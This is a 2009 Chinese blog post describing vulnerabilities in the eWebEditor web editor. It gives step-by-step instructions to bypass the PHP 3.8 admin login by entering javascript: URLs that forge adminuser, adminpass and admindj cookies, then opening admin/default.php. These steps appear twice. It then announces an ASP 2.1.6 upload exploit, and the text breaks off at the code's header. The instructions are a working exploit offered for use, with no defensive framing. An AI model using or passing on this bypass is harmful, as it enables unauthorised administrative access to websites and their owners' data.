php版ewebeditor 3.8的漏洞
作者:许诺 日期:2009-06-11
php版ewebeditor 3.8的漏洞
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
Tags: ewebeditor php 漏洞 eweb
eweb的些漏洞 方便自己查阅
作者:许诺 日期:2009-05-07
eWebEditor是基于浏览器的、 所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。 WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的 网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!
最新的ewebeditor asp版 2.1.6 上传漏洞,由于Upload.asp过滤不严,可以直接引起上传漏洞,奉送代码:
最新的ewebeditor asp版 2.1.6 上传漏洞,由于Upload.asp过滤不严,可以直接引起上传漏洞,奉送代码:
复制内容到剪贴板
程序代码
程序代码<H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----by <a href=http://hi.baidu.com/乔3少>乔3少</a></H1><br><br>
